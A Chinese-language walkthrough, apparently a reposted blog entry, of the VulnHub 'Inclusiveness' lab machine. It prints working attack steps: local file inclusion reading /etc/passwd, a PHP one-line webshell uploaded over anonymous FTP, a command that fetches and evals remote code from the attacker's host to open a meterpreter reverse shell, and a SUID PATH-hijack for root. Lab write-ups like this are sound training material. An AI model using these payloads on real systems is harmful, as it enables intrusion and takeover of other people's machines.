vulnhub之Inclusiveness的实践

admin 2024年10月7日18:45:05评论8 views字数 1617阅读5分23秒阅读模式

今天实践的是vulnhub的Inclusiveness镜像,

下载地址,https://download.vulnhub.com/inclusiveness/Inclusiveness.ova,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.197,

vulnhub之Inclusiveness的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.197,

vulnhub之Inclusiveness的实践

有web服务,做目录扫描,dirb http://192.168.0.197,

vulnhub之Inclusiveness的实践

浏览器访问http://192.168.0.197/robots.txt,

vulnhub之Inclusiveness的实践

上BurpSuite,User-Agent改成GoogleBot,

vulnhub之Inclusiveness的实践

再次浏览器访问http://192.168.0.197/robots.txt,

vulnhub之Inclusiveness的实践

浏览器访问http://192.168.0.197/secret_information,

vulnhub之Inclusiveness的实践

点击english链接,

vulnhub之Inclusiveness的实践

验证文件包含漏洞,

http://192.168.0.197/secret_information/?lang=/etc/passwd,

vulnhub之Inclusiveness的实践

端口扫描时还获取到靶机有vsftpd服务,

通过文件包含漏洞读取vsftpd服务的配置文件,

http://192.168.0.197/secret_information/?lang=/etc/vsftpd.conf,

vulnhub之Inclusiveness的实践

知道/var/ftp是可写的,

在kali攻击机上创建一个一句话木马,vim backdoor.php,

<?php system($_GET['cmd']); ?>

通过ftp上传到靶机,

ftp 192.168.0.197
Anonymous
cd /pub
ls
put backdoor.php

vulnhub之Inclusiveness的实践

验证一句话木马,

http://192.168.0.197/secret_information/?lang=/var/ftp/pub/backdoor.php&cmd=id,

vulnhub之Inclusiveness的实践

kali攻击机上创建反弹shell攻击脚本,

use /exploit/multi/script/web_delivery
set target 1
set lhost 192.168.0.195
set payload php/meterpreter/reverse_tcp
exploit

vulnhub之Inclusiveness的实践

浏览器访问http://192.168.0.197/secret_information/?lang=/var/ftp/pub/backdoor.php&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.195:8080/mEkZ7n', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

获取到反弹shell,不是root,需要提权,

转成交互式shell ,python -c 'import pty; pty.spawn("/bin/bash")',

查找root权限的程序,

find / -perm -u=s -type f 2>/dev/null,
find / -perm -u=s -type f 2>/dev/null

vulnhub之Inclusiveness的实践

获取到/home/tom/rootshell,查看发现此程序可被利用来提权,

vulnhub之Inclusiveness的实践

进入临时目录,cd /tmp,

创建文件,echo "printf "tom"" > whoami,

改权限,chmod 777 whoami,

改环境变量路径,export PATH=/tmp:$PATH,echo $PATH,

回到rootshell程序所在目录,cd /home/tom,执行,./rootshell,

获取到新的shell,id确认是root,

vulnhub之Inclusiveness的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Inclusiveness的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日18:45:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Inclusiveness的实践https://cn-sec.com/archives/1965972.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息